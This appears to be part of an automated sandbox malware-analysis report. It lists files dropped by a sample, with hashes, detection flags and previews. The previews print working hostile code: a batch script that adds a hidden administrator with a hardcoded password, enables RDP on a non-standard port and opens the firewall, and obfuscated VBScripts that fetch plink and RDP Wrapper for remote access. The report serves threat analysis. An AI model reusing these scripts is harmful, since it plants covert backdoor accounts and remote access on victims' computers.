Encrypted:	false
SSDEEP:	24:nEwfqc0uk8YWtXwsEpuB8Cu9YD7T2aZz3FZOq20HmeyfPNVYY6fJW1fvOwDdqN:EWidWtXw/pnC8YqaVx2wmnPoFfJgew+
MD5:	D17CD7F607D704BE6ABF54DF45E96016
SHA1:	CDD69E1ECEF102294F4787A8DD89FB5A86EAA3AF
SHA-256:	1A1116AAB11ED203E9013541E2D5A06E33A8A95CF25F07A09E68E82E840C572C
SHA-512:	C8C15B0236467039C941F0773CECA0C7C281D0521E905F78DF6FC520F48436DDACDC18D75A91F14F89800B0BEF0AE00D2337ABF78B41CC14C9D45AEBE305392A
Malicious:	false
Preview:	EA06....]m.;...n.T.6.%..S.\.6.<.AB..6....r.Ym..L6. ..(..h..,.[m6..R.x...qC..wI.2.T.QjU9..A"..vK-..h..v.m..p..wK...x......i5.M.........."b......4.s%.....1..{....?.k}.Ai.8d.Kx.6@.p......`.3&.Sm6I@....M..(..2...bW1..V.$..,....@.\.......Dp...l.n.H.L..6.aU;..AC.Yl7K-P..Zm.YE..d..$.`...a.Z...H..o.Z..:\|.u ..n.......b.YlwID..c.Zn.@..\....7;....9...T......+.....S2....@#@.}K$.K.......f]W.Zn.Y..j.+....s..t`.h.........l.\.....,.\.g....@ K=...8J@I.p.=.mtKM.Qa..$........-..... ".h.....nW..... .(.~.....AU.[.. . ........J-2.H.!a.....H.V....x.t../.p...x....S=.........i..+w0..p.s+....g.. ...H*....PnV{...n.\...H...@....i.[...e..o....]G.[.@q......@t.....p....z.]......>.u@......)V.M.QA.\.7..nH$S....l.]..+...=.H.2.E ..v. ..."Uj.il.m".O.. .}K.....k.7.&@...Yn........:...v;E..a.......s......./..@...._2.L&...._m..%.@..E".b.$....g..1......d..l.........'..t.....(....YnWk..}P.Li..x.~..>z...p..(.[...=..'.k...e.K..~P...^....-.....j..'.)..s-..%.9.Ra5.L&S......#....E.XlV.-.}t..'....

C:\Users\user\AppData\Local\Temp\autC410.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1292
Entropy (8bit):	7.456605818205988
Encrypted:	false
SSDEEP:	24:n1wfqc0uk8YWtXwsEpuB8Cu9YDEQ95SLzrCQt48Ksr0HyDX9hXKSOG7OaD2/:1WidWtXw/pnC8YoISLx48oHyDXbXpZ2/
MD5:	B36F2C60F18124097F22CA30DA0DC30D
SHA1:	4B66D215B94A6418CE027AAC79A94E2CDB1D70AC
SHA-256:	F1B3B7B1FCB7E4A8CFA6300066057BF6C55F2AE0F3365F8481EE8F930263B6DB
SHA-512:	43A781EE27C1D3540F5DF960499FE0FB7408C709D322D1DC6F059E64FE2ACE3A9682DCE8F552BCE4C3A4720EAF35E81F9D331E080BDE9B6ED6606FC2F7C11059
Malicious:	false
Preview:	EA06.....]m.;...n.T.6.%..S.\.6.<.AB..6....r.Ym..L6. ..(..h..,.[m6..R.x...qC..wI.2.T.QjU9..A"..vK-..h..v.m..p..wK...x......i5.M.........."b......4.s%.....1..{....?.k}.Ai.8d.Kx.6@.p......`.3&.Sm6I@....M..(..2...bW1..V.$..,....@.\.......Dp...l.n.H.L..6.aU;..AC.Yl7K-P..Zm.YE..d..$.`...a.Z...H..o.Z..:\|.u ..n.......b.YlwID..c.Zn.@..\....7;....9...T......+.....S2....@#@.}K$.K.......f]W.Zn.Y..j.+....s..t`.h.........l.\.....,.\.g....@ K=...8J@I.p.=.mtKM.Qa..$........-..... ".h.....nW..... .(.~.....AU.[.. . ........J-2.H.!a.....H.V....x.t../.p...x....S=.........i..+w0..p.s+.)H..e.....a......PnV{...n.\..."Q0......\.......y.J.g...%...l.....\."..K-....W+u..r.]..+. .\|\....)=.R...t.......H..... .YnW0.r{".Le....Ae.X..@...D..(...E"..@......K....o.L......s..-.K..u/...v.-..s.[m6;...o.]%.;}._w....{..e0.M%.....i.K...D...H'.K...g.b.......i..@.r.9...P..i..@.~P........d..T..'......\|.;...A.Q..+..z."O...e..<.......,..'..[,7+.....O.S...[1.Kfs...k:.L.S....G..?..n...[$....

C:\Users\user\AppData\Local\Temp\autC421.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1684
Entropy (8bit):	7.50889167794876
Encrypted:	false
SSDEEP:	24:nVuwfqc0uk8YWtdFxDOFM+fER+WdAFUwUMneTqGnVeva5IKxhDGzGokYpxv71X0:4WidWtdFlOS+o+A2xUMnMH+EDJ6pt6
MD5:	992B1C2F7AD4FB50ABC99643F40DADF4
SHA1:	38FFBFB56D0981BF689664AA279C4CC0D90500C6
SHA-256:	D43A2B171FBE2A0A0EF19D42E4A86B98D7804CB1D566CC24C5C7B28053D0DA10
SHA-512:	5E418C5B6F326A64848AC81B73B04FA51B066710E6C6AB1E7CB14EEF7639681A48344150307B8B1A09AA0DAC8A4DD65D4939E77FBC6D8FB7F22D144C26A2B68B
Malicious:	false
Preview:	EA06.....]m.;...n.T.6.%..S.\.6.<.AB..6....r.Ym..L6. ..(..h..,.[m6..R.x...qC..wI.2.T.QjU9..A"..vK-..h..v.m..p..wK...x......i5.M.........."b......4.s%.....1..{....?.k}.Ai.8d.Kx.6@.p......`.3&.Sm6I@....M..(..2...bW1..V.$..,....@.\.......Dp...l.n.H.L..6.aU;..AC.Yl7K-P..Zm.YE..d..'.....b.Q.t...AS....u=.1.>.j....N.r..........nwK-..s. ...o..,..%^..YK.7+=..e.].r.H.i(...`..@..........p._i .`..e.....e..@.s...7K,..).....o..@Ap....`..vkuJ.p.J.t.d..P.H.`7...[ ....X..% (.8...%..(.....X....n...n@.......El7+...v.....S..R. ...[u.......Y..%..L......@....@.....:.....8.J...R..)..efA_.e.N.l..V.....r.Xm.Z.p...w{}..].J@..L.AA.\.7.@...0............Eb....06.e..V[=...p\..{e....O@{ ...a.].$.;..[.....]..#..T.H..I.o........E@.Ylv.\|..f.H...,.H.v[...c....>).....\..;M.{".T..l.[3.Kf.I..D.W....}.._.*@.~Y.....\+..}..=...`.....".]......Y.V...Aw.YnVY...%...Ag.-.f....a.]l..........K%..i...%...Ki..]..8..%._d....S .[......l.=.........y..._.vg.P.fJ.Q.................o...o..m..1...\|`d

C:\Users\user\AppData\Local\Temp\autC431.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1992
Entropy (8bit):	7.5426647205821595
Encrypted:	false
SSDEEP:	48:xlU3+FL9vAMDy1Ql3U0ClWp149/KGuqHEGUFQ2hhfkkaH:DUcKmmvlu4OqHX+XaH
MD5:	41BF21000996D9BF916A0058DC2AB0A8
SHA1:	AB03EC108844D43061F7316ECAA81F0015F61E1C
SHA-256:	66BBF86AD5448C4EA69C0BA304F763E62441C6EFD2CC4AC3BF99529C82570FEC
SHA-512:	8F6DB0E8503E4CFAEF3774325BCBB9C62691CF8D0B5B157A32217A6A14CA03516E1428473D8B09B246DD807FDA2CEE78AEA40AD071DB84BD0976012622E59457
Malicious:	false
Preview:	EA06......Z.J.R.T..;... .Yo.Hl.i..,.;\|.Av.[.K-.....n..}..F......^.c.Zn.Iu..e..,.....c.J$@......5..e..nwK-..s.)L6.s.A.v.-......\| .... .m..p.Zn@..........u..n.ZnV.u..n.T. .b.(.I@.....%.Jd.i..."....M..a.Z.....u\.\..{... ..nu... ...K-....Zm...Kh.]..9._t.Ye.[...h.[-2....t.I,6.}..t.^e...2.t...s)}.....,....."..i.Z..)u..m.......r.K.VK........-..e.......o..%.i..m..K.&...Z...u..p.....u.H...."Qp..)..m.Y ..g..H.i.........A.....r......Ba 8(..=...........\|`3U....X.7KM..._.....{..V.p...'..u$..... ....F.2....y.YnVP..K$.@....v.-..(..&.....n..(....K..[.....d..f]D....P...NEi...............n.a....(...X..P..[.....?.}.....Qm.I.&..... j.6.F..`W....T..yE2.n..:.....t..l6+...f..-6.]..n...7+...v../7...e3.Mf.y......m6...b...o..@.Q(.D@.....m..!.5.. ...2...@......3....h..M....H)6..D.H%...fW ..d...H.......`........q.....l.....e.M%.....s.....d.....o..d..o..........~m..P.K...m..c.)-.It.]0.."....A'...0.h..(.+(.X.<.....@.....^n.Y..i.K..2.?..B..>.*..e..=...UK}..n....4.=.5n...._......`...@.v.M.

C:\Users\user\AppData\Local\Temp\autC442.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2982
Entropy (8bit):	7.596207219569419
Encrypted:	false
SSDEEP:	48:FjBRdV59IEpuM5QYInaN/ueL0g3O/rmCGv0Iyze3UCIZB49ECWUhS71i0Rt:fRfzgFTnaNme4ckiCGcIyzor3ei0z
MD5:	E68D32C64E7A9F5B346950DDABF72670
SHA1:	BACCAAA7ABF72421EFF6BFDF36D6EF10CCB77C52
SHA-256:	6971CAC146911AD09D7A4D56084D3239007C5D932083004616AF64DD96A51EC3
SHA-512:	4074C32AD02F0B39D68F99D55582499838CCEF9ACADDAC16D5E058792034E69CD32294A71D5A7CE819786010823C1B5EC39B42B874A3E7A3CE405CD9A0D57ECC
Malicious:	false
Preview:	EA06..$..]lV.M.AF..wKM.. .\.6..r..,W.... .Yo.Id..3..-.S..Q..)..A=.Ld.K\|..e.J.....@..Xg.....d....Y..f.X@.....h...........`...g$.......K...(...r.m...x.,2..S ..F...... ....N..!..l.n..n......J.n.[.;...n..$.+.X.\|...T....[4KM..I.H-..p.)a....o.\..e..T..`...b..,.k=..j..-..}..r....k...z..tJ-..H..t.m:.P..uJ.Z.X..@...Z.R....o.....(.]..F@.i.Y@......Y`............. ..R..&.t.J...h..+..eU+u.V..Je.. .N@L.......(`.#...@H[5..,.Y.2....,.\.......,...;...t...V.-..(.T.w+M....K..e..y..,....H. ...."...[.....Ynw[m..N..f.k...L....Eo.Y..}6.P..).....:.T.V.=..m..-7:.J.P.U.V....r.H.@..E..t..n.@..r..".....s.K..+..]g..-.[...e.X....t.X...}..m.\...}..p.....m....K.V.t..7.........:...XnvY..n...Y@..s...... .....}b.L......`....w@..=.z.dT...l.K...m..c.W.4..a".J@.....z...p..(..(....X.2 ._...r....T..,.,..i..7....n..... ..u.....e..k.R.[.V.u..y.B..\.9.....K.8...N..-.. ....S.....o..Y@..I<].`..... ...@..@:.......M.....A$......@...H.;..e..n@........W Q.X./..o.....G?.....-..a`....k....d.S..,b{1.+...t.G

C:\Users\user\AppData\Local\Temp\autD470.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	882
Entropy (8bit):	7.425166218139306
Encrypted:	false
SSDEEP:	24:n+o8oRmIsDg1rykjNsxcBRyZh2Pw4myXx8XKR2V:+otRUDg1mSNCcJmCR2V
MD5:	90A6B17ADC2F59A75CDC3FC366BA7BA4
SHA1:	6A7930DD88163F5C088CD968E6EEDFC10CA5E8A8
SHA-256:	F7D078E158D80864DCCAD7E35D5E8FD080F846CE19726E5339E1E2C2F51B0E57
SHA-512:	6D4C3AA718B5CA4518064DFE2A60A3BD355A8E0E5213057141E4AA2426CB501EA17B2D434BC8232B9CF8A8E4AAF7BD8F94866611AFA5F579A7584BB4B280DA36
Malicious:	false
Preview:	EA06...~.H,.;E.Ao.Y......l...6...Aa.[m6.~.i.OdU9l.[5...R..i".....m..,.....r.%.&.P.]Y......t..fs9...........,.+}...Q....i..@.P.lH...-.. .Wd.....,.....m..%.k...e.f,...._f.H..[e..s....,.. ....<.E%.Rd.)..S .[......l..7........v...l.J...@+4....<.Y....`._.@.'..q...6.}..n..f ..Xnw9.d.:.....A%.#...(..%.K.6K .... ..I@G.I(....~..........~[...o...9...a.\...=.uu..........Yl.3.A".R...N.F.U.5-r.i...;}..\..m.K}.. .U+.;...e.].....n..@.@...p...6.e...5...L... ...G.I.J.G......A/.q&..9.&... ..Ff.k.[k.:.N.E..:.o.].V.eN.t....T..N...AS...[...S.Xn..e.R.T%.K.....T..Ju..b..@..$...RP.x....!K...r...6.d..'`.M..l..5S.... .Y@..".\.V.5..e..m....o.........L3....w.Y-7)..X......\|.......h..9.....m.......-...+-....X..m..c.]@a....h.H..[u.uP.[..+.....\.@.?....p.Xn...O....D..w[..qS..n..@..s..$..(..S...._.5..c...r...t....N.s.Ym.9.r.s..7....x..@..U....Zm.[}.....f..P.. ....K...

C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	9399
Entropy (8bit):	5.2787181340236815
Encrypted:	false
SSDEEP:	192:9FwfFxcV7S5y1Z87o0N8/TQN5yF/Bzb5cUxwRKB2:Cy1Z8km8/EaB2
MD5:	C3D2E2CCD47E66FBA54C582BF5B09A2C
SHA1:	176455067DCC15E2CC309ACC25A012D23326EFBD
SHA-256:	C8B96C7092DD44A961562790BB1712012DDFD6F6764AC6A57ED0075FB1E832C4
SHA-512:	D57634CBEBBD14070813C779D7E1E7D3CE3C5449BB0189176E601237E5D8A9A92980DF1F18D0F8898F3A5541F32104B4F89D1645A0CB355E7B60F90FF2711628
Malicious:	true
Preview:	Public Function transform(byval text, byval key)..For i = 1 to len(text).. a= i mod len(key): if a = 0 then a = len(key).. transform = transform & _.. chr(asc(mid(key,a,1)) xor asc(mid(text,i,1)))..Next....End Function..Function RandomString( ByVal strLen ).. Dim str, min, max.. Const LETTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ".. min = 1.. max = Len(LETTERS).. Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Dim fso, f1, ts, s.. Set fso = CreateObject("Scripting.FileSystemObject")..Str = "On Error Resume Next" & vbCrLf & _.."obf_HOMEPATH=""C:\Program Files\RDP Wrapper\""" & vbCrLf & _.."obf_autoupdateUrl=""https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdate.bat""" & vbCrLf & _.."Function obf_Base64Encode(obf_sText)" & vbCrLf & _.." Dim obf_oXML,obf_oNode" & vbCrLf & _.." Set obf_oXML=CreateObject(""Msxml

C:\Users\user\AppData\Roaming\UeNuQ\192.vbs

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	5.140016348549468
Encrypted:	false
SSDEEP:	48:0MT7ObieFxfHjHT846dWIoWILIz7L6SdPUa:ZaFxPjIJWpW2QqSdl
MD5:	E526DA1842354849CFC018128001A6B4
SHA1:	921F1AB5499EB550A351D4A394BD44DF5D173EA5
SHA-256:	563DD781DD63543F7EE67747F044FBD77877CD46E34DF7DE1C96F287EEB39B14
SHA-512:	79B4F306F9D89AF12441FB6DF2221A0FF8B9124FF23FADCA037ED2319EB6A989BC94595598C49B61ED2E8DC12015B68190E59B7658EEAF1825D8D37DE2586865
Malicious:	false
Preview:	Function RandomString( ByVal strLen ).. Dim str, min, max.... Const LETTERS = "abcdefghijklmnopqrstuvwxyz0123456789".. min = 1.. max = Len(LETTERS).... Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Sub CreateTextFile(body, filePath)...Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject").....Dim objFile : Set objFile = objFSO.CreateTextFIle(filePath, True)...objFile.Write body...objFile.Close..End Sub......Function fnRepl(sM, nP, sS).. fnRepl = gdX(sM)..End Function......Function mkDic(aK, aV).. Dim tmp : Set tmp = CreateObject("Scripting.Dictionary").. Dim i.. For i = 0 To UBound(aK).. tmp(aK(i)) = aV(i).. Next.. Set mkDic = tmp..End Function......Dim gdX : Set gdX = mkDic( _.. Split("[script_path] [arg]") _.. , WScript.Arguments _..)..Dim r : Set r = New RegExp..r.Global = True..r.Pattern = "\[[^\]]+\]"..Dim sT : sT = Join(Array( _.

C:\Users\user\AppData\Roaming\UeNuQ\400.vbs

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	5.143041689578078
Encrypted:	false
SSDEEP:	48:0MT7ObieFxfHjHT846dboWILIziL6SdPLE:ZaFxPjIJMW2Q3SdDE
MD5:	D427D2ED9DB86D08B38F5F8B5EEC4493
SHA1:	5CFE9F751BAD99009ABF1A642EEC8F7C67870051
SHA-256:	7D0CB57BA7D2AF6FF75A9C203D1338CE31199D07EECA391E9A82FEDCBE068512
SHA-512:	FC381EC4B2DCDFD10D55D5D317E7A6011DA9A859A7E98A84D49391637AA22EAF983875C9BF5BAD8403B006566D4053D8F8946D3CBD52A433EAC60C26F73CF659
Malicious:	false
Preview:	Function RandomString( ByVal strLen ).. Dim str, min, max.... Const LETTERS = "abcdefghijklmnopqrstuvwxyz0123456789".. min = 1.. max = Len(LETTERS).... Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Sub CreateTextFile(body, filePath)...Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject").....Dim objFile : Set objFile = objFSO.CreateTextFIle(filePath, True)...objFile.Write body...objFile.Close..End Sub......Function fnRepl(sM, nP, sS).. fnRepl = gdX(sM)..End Function......Function mkDic(aK, aV).. Dim tmp : Set tmp = CreateObject("Scripting.Dictionary").. Dim i.. For i = 0 To UBound(aK).. tmp(aK(i)) = aV(i).. Next.. Set mkDic = tmp..End Function......Dim gdX : Set gdX = mkDic( _.. Split("[script_path]") _.. , Array(WScript.Arguments.Item(0)) _..)..Dim r : Set r = New RegExp..r.Global = True..r.Pattern = "\[[^\]]+\]"..Dim sT : sT = Join(

C:\Users\user\AppData\Roaming\UeNuQ\54.vbs

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2312
Entropy (8bit):	5.1464735332086144
Encrypted:	false
SSDEEP:	48:0MT7ObieFxfHjHT846dGCoWILIz7L6SdPZW:ZaFxPjIJGvW2QqSdo
MD5:	193242114C1738D0EA04AA93659FDD5A
SHA1:	A929CC1CFBE44BA8A99117DFD7819776AB45D465
SHA-256:	C879379224BC8DC4A4F495F989711714A936892B11E7A1CF6E7B79654DC8F928
SHA-512:	46825C3CC42C3C2E86A3890B29B3A2CF9B30E892D0D38BFB2E3334FFA3951B8F732B2786BDFFA528EE6FF05C789C35E963F069D54680C3E16735165072E6FEC4
Malicious:	false
Preview:	Function RandomString( ByVal strLen ).. Dim str, min, max.... Const LETTERS = "abcdefghijklmnopqrstuvwxyz0123456789".. min = 1.. max = Len(LETTERS).... Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Sub CreateTextFile(body, filePath)...Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject").....Dim objFile : Set objFile = objFSO.CreateTextFIle(filePath, True)...objFile.Write body...objFile.Close..End Sub......Function fnRepl(sM, nP, sS).. fnRepl = gdX(sM)..End Function......Function mkDic(aK, aV).. Dim tmp : Set tmp = CreateObject("Scripting.Dictionary").. Dim i.. For i = 0 To UBound(aK).. tmp(aK(i)) = aV(i).. Next.. Set mkDic = tmp..End Function......Dim gdX : Set gdX = mkDic( _.. Split("[username] [password] [script_path] [bat_path]") _.. , WScript.Arguments _..)..Dim r : Set r = New RegExp..r.Global = True..r.Pattern = "\[[^\]]+\]"..D

C:\Users\user\AppData\Roaming\UeNuQ\578.vbs

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2970
Entropy (8bit):	5.212134107492503
Encrypted:	false
SSDEEP:	48:0MT7ObieFx6xqHT846di8poWpD13RNVR4VWBp0AOgNgaG6G6pLVrntZ9:ZaFx6qIJi8GWFpDEmPRRBhtX
MD5:	0884B6E1AAF279208FE5F97CBFA85276
SHA1:	388F310A0D62A3362DB22659E93CB6CB517C21B8
SHA-256:	490C84854174FA43F15D9CA2967578ED5AA614F5327CCCCB5CB6BA589DB3AEB6
SHA-512:	68D515E3660306E7E6C7A5661B41232E6A19788EF05D614962F64873056DCC8A5489C4D1AC22AD2E3F632D6C4E7497A40D0511527F0AC1A8E0DFF7366731EEAD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	Function RandomString( ByVal strLen ).. Dim str, min, max.... Const LETTERS = "abcdefghijklmnopqrstuvwxyz0123456789".. min = 1.. max = Len(LETTERS).... Randomize.. For i = 1 to strLen.. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ).. Next.. RandomString = str..End Function......Sub CreateTextFile(body)...Dim objFSO : Set objFSO = CreateObject("Scripting.FileSystemObject").....outFile = Wscript.Arguments.Item(2).....Dim objFile : Set objFile = objFSO.CreateTextFIle(outFile, True)...objFile.Write body...objFile.Close..End Sub......Function fnRepl(sM, nP, sS).. fnRepl = gdX(sM)..End Function......Function mkDic(aK, aV).. Dim tmp : Set tmp = CreateObject("Scripting.Dictionary").. Dim i.. For i = 0 To UBound(aK).. tmp(aK(i)) = aV(i).. Next.. Set mkDic = tmp..End Function......Dim gdX : Set gdX = mkDic( _.. Split("[username] [password]") _..., Array(Wscript.Arguments.Item(0), Wscript.Arguments.Item(1)) _..)..Dim r : Set r = New RegExp..

C:\Users\user\AppData\Roaming\UeNuQ\728.vbs

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4044
Entropy (8bit):	5.31725129526118
Encrypted:	false
SSDEEP:	96:ZZraPFyUNA56qFpAf99ijyRXI7bpYff85pH1Ys8:ZZEFyUG5bAf9kjyRXI7F4fwHs
MD5:	9D9DB5D38F36F9FE0507B6B1E92DB580
SHA1:	CF3540ADC4492B9C7BF834A330B44FBF9A48E62B
SHA-256:	ED2AB7CD78D55ECAC4B6BF9A83C7E9CC3ED661C0812E2F8EE9E5E94B6076B506
SHA-512:	601DE6AAF76536DDB54464EB3C9521F69A37F56AC38646F9676B0019D2BEB74D27353189EF702817EC07859AA737E6998FFEA6120B0DCA20D2E05825F68F864D
Malicious:	false
Preview:	ON ERROR Resume Next..Dim fso, vFolder..Set objFso = WScript.CreateObject("Scripting.FileSystemObject")..set shell = CreateObject("WScript.Shell")..appdir = shell.expandEnvironmentStrings("%appdata%") & "\"..mainPath = "C:\Program Files\RDP Wrapper\"..link1 = "https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe"..link2 = "https://github.com/stascorp/rdpwrap/releases/download/v1.6.2/RDPWrap-v1.6.2.zip"..main..Sub unzip(pathName, fileName)...If isFile(pathName & fileName) Then....Set fso=CreateObject("Scripting.FileSystemObject")....Set shell=CreateObject("Shell.Application")....Set files = shell.NameSpace(pathName & fileName).Items....shell.NameSpace(mainPath).CopyHere files, 4....WScript.Sleep(100)....Set getfile = fso.GetFile(pathName & fileName)....getfile.Delete....WScript.Sleep(100)....Set getfile = fso.GetFile(pathName & "install.bat")....getfile.Delete....WScript.Sleep(100)....Set getfile = fso.GetFile(pathName & "uninstall.bat")....getfile.Delete....WScript.Sleep(100)....S

C:\Users\user\AppData\Roaming\UeNuQ\939.vbs

Download File

Process:	C:\Windows\SysWOW64\cscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3817
Entropy (8bit):	5.432101891893751
Encrypted:	false
SSDEEP:	48:esIDaR2debTKky9/C9Ru1TrBia5Gt4qm9PmVIZs7rbQ9cceAylxOcfAxP74:eLdWGwXuFPo4EaZs7HQ9cpnfA974
MD5:	06C18E67C03C25B9513D90F8275271B4
SHA1:	100008661F21AF9C6A5A51683DE0F278E0DFB483
SHA-256:	9C482545DC24B34AE93BDE1621E2AB5AC828690BD7280D395BF317B64714A344
SHA-512:	6CBC2579DDB7AB93C90CA1987F289EC06874A933A1582C474FB9C67FB9FC22815F9CD1FCB03CCFD9A8E563BFA662EE2EB96D7DA880ACCA6158B741BE0A0B6BC3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next..zD="C:\Program Files\RDP Wrapper\"..ka="https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdate.bat"..Function vt(zx).. Dim sT,GV.. Set sT=CreateObject("Msxml2.DOMDocument.3.0").. Set GV=sT.CreateElement("base64").. GV.dataType="bin.base64".. GV.nodeTypedValue=UZ(zx).. vt=GV.text.. Set GV=Nothing.. Set sT=Nothing..End Function..Function CE(ByVal vCode).. Dim sT, GV.... Set sT = CreateObject("Msxml2.DOMDocument.3.0").. Set GV = sT.CreateElement("base64").. GV.dataType = "bin.base64".. GV.text = vCode.. CE = yK(GV.nodeTypedValue).. Set GV = Nothing.. Set sT = Nothing..End Function..Function UZ(Text).. Const CW=2.. Const tF=1.. Dim eU.. Set eU=CreateObject("ADODB.Stream").. eU.Type=CW.. eU.CharSet="us-ascii".. eU.Open.. eU.WriteText Text.. eU.Position=0.. eU.Type=tF.. eU.Position=0.. UZ=eU.Read.... Set eU=Nothing..End Function..Function yK(Binary).. Const CW = 2.. Const adTypeBinary = 1..

C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1374
Entropy (8bit):	5.210805270439001
Encrypted:	false
SSDEEP:	24:2CYg1Yvcf7cE8Jyb7eftTy1tGvUv5jaxV2MZKh3TDsd5aTEubQubQaLUauEW6QMR:jd1S7tJy2ZyVyp0dUaw/iLHr9
MD5:	16F9ADDCB09C55B18B71E33ACE303845
SHA1:	ADD094205A27FA7987C53AC2D8F40475DFB419D6
SHA-256:	FA3F24047A068BAF9FA641408F54EEB0630AB39DFC3E3FFA0D87ECD1BA0439E3
SHA-512:	EDF6A09BFD7806EFC548846E1EBAAC0921A9C0023F555888F890CF524B5541377DBD6B16DB3E7E54E04F511E5278C8555AEC61F822312211C62D3F9B8BC2B2D3
Malicious:	true
Preview:	@ echo off..setlocal..set admins_sid="S-1-5-32-544"..set remote_users_sid="S-1-5-32-555"..set rdp_port=13389..set "wmic=wmic group where sid=%admins_sid% get name /value"..for /f "delims=" %%i in (' "%wmic%" ') do 1>null set "%%i"..set admins_group_name=%name%....set "wmic=wmic group where sid=%remote_users_sid% get name /value"..for /f "delims=" %%i in (' "%wmic%" ') do 1>null set "%%i"..set remote_users_group_name=%name%....set login=fsUIwEqMAc..set pass=zyTFxcsIkA..net user %login% %pass% /add..net localgroup %admins_group_name% %login% /add..net localgroup %remote_users_group_name% %login% /add..net accounts /maxpwage:unlimited..reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %login% /t REG_DWORD /d "00000000" /f..reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d %rdp_port% /f..netsh advfirewall firewall add rule name="RDP Port %rdp_port%" profile=any protocol=TCP acti

C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll

Download File

Process:	C:\Windows\SysWOW64\cscript.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
